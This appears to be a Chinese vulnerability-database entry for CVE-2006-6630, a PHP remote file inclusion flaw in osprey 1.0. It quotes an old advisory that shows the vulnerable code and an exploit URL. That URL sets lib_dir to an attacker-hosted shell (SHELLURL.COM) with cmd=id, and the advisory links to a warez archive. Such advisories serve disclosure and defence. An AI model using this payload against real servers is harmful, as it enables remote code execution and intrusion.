osprey 'ListRecords.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192436 漏洞类型 未知
发布时间 2006-12-18 更新时间 2006-12-18
CVE编号 CVE-2006-6630 CNNVD-ID CNNVD-200612-398
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/87234
https://cxsecurity.com/issue/WLB-2006120110
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-398
|漏洞详情
osprey1.0的ListRecords.php存在PHP远程文件包含漏洞,远程攻击者可以借助lib_dir参数中的URL执行任意PHP代码。
|漏洞EXP
#=======================================================================
=======================
# osprey 1.0 (ListRecords.php)  Remote File Include Vulnerability
#=======================================================================
========================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://warez.gtasoft.ru/skripts/p4CMS.v1.05.Nullified-WTN.rar      
#                                                                                                                  
#
#=======================================================================
========================= 
#Bug in : ListRecords.php
#
#Vlu Code :
#--------------------------------
#
#

require_once($lib_dir .'Document.class.php');
#                    
#                    
#
#=======================================================================
=========================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/ListRecords.php?lib_dir=http://SHELLURL.COM?&cmd=id
#
#=======================================================================
========================= 
#Discoverd By : KaBaRa.HaCk.eGy
#
#Conatact : KaBaRa.HaCk.eGy[at]hotmail.com
#
#GreetZ : eGypT.GHosT - ToOoFa - LeCoPrA - MaHmooD_ali - MoHandKo - The_Sniper - Broken-broxy - abdoullaH00
# AND My BroTherS Turkish HaCkeRs--> HaCkerfreeze &  My Turkish TeaM--> BelGium SeCurity FoR My BrO ..MeRtXx..
# Special Thx To : TryaG.CoM & AsbMay.NeT
========================================================================
==========================
|受影响的产品
ibiblio Osprey 1.0
|参考资料

来源:BUGTRAQ
名称:20061016osprey1.0(ListRecords.php)RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/448903/100/0/threaded
来源:SREASON
名称:2042
链接:http://securityreason.com/securityalert/2042